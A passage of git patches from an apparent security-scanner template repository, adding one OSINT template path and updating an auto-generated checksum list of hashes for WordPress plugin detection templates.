--- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f34fb5d499..2ca42906cc 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ http/misconfiguration/ecology-info-leak.yaml http/misconfiguration/missing-sri.yaml http/misconfiguration/nacos/nacos-create-user.yaml http/misconfiguration/php-debugbar-exposure.yaml +http/osint/gist.yaml http/takeovers/lemlist-takeover.yaml http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml From 0bdfe9523ecf478b1e7f0336995c7d07b8273742 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 08:27:24 +0000 Subject: [PATCH 0174/1090] Auto Generated Templates Checksum [Wed Sep 6 08:27:24 UTC 2023] :robot: --- templates-checksum.txt | 431 +++++++++++++++++++++-------------------- 1 file changed, 216 insertions(+), 215 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a82d84b964..445f190a6c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,7 +418,7 @@ helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5 helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:a8b5e8e7888f955067310ada3053ab19bf9e01f9 helpers/wordpress/plugins/ewww-image-optimizer.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b -helpers/wordpress/plugins/facebook-for-woocommerce.txt:259384e042d78de5c4a778a065bb73dad996fb07 +helpers/wordpress/plugins/facebook-for-woocommerce.txt:98f2be81dca85d834586d9f281c4849476edffb2 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c @@ -431,19 +431,19 @@ helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe helpers/wordpress/plugins/gdpr-cookie-compliance.txt:9e4d99fe9543741fae861b8214e954feb69c7c36 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:be1f3ed636fa57d09193a4000944b026539f2ae8 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:a62f0cd70e2969845fd702e631526007e426ec31 -helpers/wordpress/plugins/google-listings-and-ads.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 +helpers/wordpress/plugins/google-listings-and-ads.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/google-site-kit.txt:2d61b8dd1d2334f5ff6b9c2010bf4078470db01d helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61 helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 helpers/wordpress/plugins/gutenberg.txt:c0efed1067cd93e221bc8de8ca57acf6011c6273 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 -helpers/wordpress/plugins/header-footer-code-manager.txt:c2e02b33da3f80da726e9cf198552626bb5042e8 +helpers/wordpress/plugins/header-footer-code-manager.txt:1653860f5bc7d2d43d6254c11488c4469d9db444 helpers/wordpress/plugins/header-footer-elementor.txt:a9510f9e42b212b735a604c279959b616f8ddd5a helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 -helpers/wordpress/plugins/host-webfonts-local.txt:e1153a589f6a6a243a8374b1e372cf2e69de87fc +helpers/wordpress/plugins/host-webfonts-local.txt:e8eea86ae4c46099848f3535a6610e2faf76f4c1 helpers/wordpress/plugins/imagify.txt:d24fa45ca77f079cc359c97272276969e6aead2c helpers/wordpress/plugins/imsanity.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/insert-headers-and-footers.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 @@ -463,9 +463,9 @@ helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937cdd40d38 -helpers/wordpress/plugins/mailpoet.txt:4e0e9b8af035e0887466f99581b3657149805e2c +helpers/wordpress/plugins/mailpoet.txt:e779613ff1acc7ee99576cbf9159c456876a34b2 helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924 -helpers/wordpress/plugins/mainwp-child.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e +helpers/wordpress/plugins/mainwp-child.txt:4fd5e5d395c7cb4645820b58e23fdf6fe34349ab helpers/wordpress/plugins/malcare-security.txt:110e72e19320b384e7459b22647e5acdb0255c57 helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:237c8767860dc44f0f30057d25e9143e3d0b425f @@ -484,7 +484,7 @@ helpers/wordpress/plugins/password-protected.txt:5f099bc6f95ad230bf3e17b9745270e helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pinterest-for-woocommerce.txt:2a9b0f4a3fc4e928b28f1e9507e9ccf7de813bd5 +helpers/wordpress/plugins/pinterest-for-woocommerce.txt:01bb70d2c31d6761b11228cfd235f5be71cefeef helpers/wordpress/plugins/pixelyoursite.txt:d8e23ca5790b46b3d6b48f23efe069ee480120e3 helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 @@ -494,7 +494,7 @@ helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa45 helpers/wordpress/plugins/premium-addons-for-elementor.txt:fba90fa57ee2b5dbb2faec1c33e96813ccb14fd5 helpers/wordpress/plugins/pretty-link.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea33a helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/really-simple-ssl.txt:c7a2e88969233a7480fbd47edd573ec3f30ff05c +helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 helpers/wordpress/plugins/redux-framework.txt:1375dc6042d338e0d6b89174d9c404b7ebdae9cd helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 @@ -517,11 +517,11 @@ helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b1 helpers/wordpress/plugins/table-of-contents-plus.txt:40bf252ebc68d2921a7e909064c29fd95a1820fb helpers/wordpress/plugins/tablepress.txt:5f6af51e77b84cd6616d4eaa100a736096568d86 helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c2f0318fc0f9 -helpers/wordpress/plugins/the-events-calendar.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff +helpers/wordpress/plugins/the-events-calendar.txt:cffca9b2145cbe8b44269c74219f807eace99c3e helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:67c391fdae5d34abde64a1732ca064007569702b +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:542fcad9f152498b9736a0d61c8dcaf40bf66055 helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:ef52ef5de56c32d1410d7eb141c26ff4e9fbe4b4 @@ -537,15 +537,15 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:85e58fba8dcfa56b29939775178a4af11946316b -helpers/wordpress/plugins/woocommerce-payments.txt:f761ee50908e2e01cb058b4b2f46366c4d288e93 +helpers/wordpress/plugins/woocommerce-payments.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87 -helpers/wordpress/plugins/woocommerce-services.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 +helpers/wordpress/plugins/woocommerce-services.txt:17b06b2486a051055e43ae1127e87196d505e2f3 helpers/wordpress/plugins/woocommerce.txt:758e3631d239f1de32442015f0033cc31a84dcec helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40784b4a67e4ba8b48f28ea24427fa8550433cc1 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8 -helpers/wordpress/plugins/wordpress-seo.txt:18b66e1ee3dc142534c1d5c03f7bded8db5d3466 +helpers/wordpress/plugins/wordpress-seo.txt:813eb0113a2a5b9f5219e1d0563a0b2af5fed4d6 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-fastest-cache.txt:ff3f1d7d10cbdc5507eb5d03d8f7d10b89642646 helpers/wordpress/plugins/wp-file-manager.txt:9d90f00e19f5543904caf9ab2abd5b800e0613c0 @@ -4948,6 +4948,7 @@ http/osint/gfycat.yaml:1db9b5d0c75a48ca459847bc6af0a46fb0decd3f http/osint/gigapan.yaml:f2439c5bfcf5a10e8c1d1fc45f044c37d611547c http/osint/giphy.yaml:23cf5788c58725a7f0b51069df4f735f1f9214cb http/osint/girlfriendsmeet.yaml:509bf4f08dd7ab6da3a4d4493fe90ea6abfd0609 +http/osint/gist.yaml:1a9ad5862cc6c1c41cf369c7c6c8d877949be665 http/osint/gitea.yaml:a41ee9765f7dca1884a94e81fe0a9c42472c3c42 http/osint/gitee.yaml:71d6446799f739615892e38f3f32973042be84f4 http/osint/giters.yaml:8e70a5e11e11baed58ac9abb0ad0af581423a221 @@ -5803,218 +5804,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 